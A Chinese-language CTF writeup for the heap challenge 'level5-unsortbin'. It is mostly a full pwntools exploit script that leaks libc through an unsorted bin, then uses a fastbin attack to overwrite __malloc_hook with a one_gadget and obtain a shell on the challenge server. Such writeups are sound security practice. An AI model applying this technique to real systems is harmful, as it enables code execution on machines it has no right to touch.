MENU

Catalog

    *CTF unsorted bin leak & fastbin attack level5-unsortbin Writeup

    November 19, 2020 • Read: 522 • Pwn

    UNCTF2020中的babyheap,官方wp用的是unsorted bin attack修改fastbin最大大小。
    所以特意看了一下这题,结果发现这题是unsorted bin leak,不过不做白不做,花了一个小时做掉了。
    等一下会找一下unsorted bin attack的题目
    待补充...

    # -*- coding: utf-8 -*-
    from pwn import *
    context.log_level = "debug"
    #r = process('./level5-unsortbin')
    r = remote("pwn.sixstars.team", 22505)
    elf = ELF('./libc.so.6')
    #elf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
    def add_note(size):
        r.sendlineafter(">> ", "1")
        r.sendlineafter("Size:", str(size))
    
    def show_note(idx):
        r.sendlineafter(">> ", "2")
        r.sendlineafter("id:", str(idx))
    
    def edit_note(idx, content):
        r.sendlineafter(">> ", "3")
        r.sendlineafter("id:", str(idx))
        r.sendlineafter("Content:", content)
    
    def dele_note(idx):
        r.sendlineafter(">> ", "4")
        r.sendlineafter("id:", str(idx))
    
    
    add_note(200)
    add_note(0x68)
    dele_note(0)
    show_note(0)
    #main_arena + 0x58 = leak addr
    #main_arena - 0x10 = __malloc_hook
    #__malloc_hook = leak_addr - 0x68
    malloc_hook_addr = u64(r.recv(6).ljust(8, '\x00')) - 0x68
    libc_base = malloc_hook_addr - elf.sym['__malloc_hook']
    
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    one_gadget = libc_base + one[2]
    print "__malloc_hook: " + hex(malloc_hook_addr)
    print "one_gadget: " + hex(one_gadget)
    
    dele_note(1)
    edit_note(1, p64(malloc_hook_addr - 0x23))
    add_note(0x68)
    add_note(0x68)
    
    edit_note(3, 'a' * 0x13 + p64(one_gadget))
    #gdb.attach(r)
    dele_note(1)
    dele_note(1)
    r.interactive()
    
    Archives QR Code
    QR Code for this page
    Tipping QR Code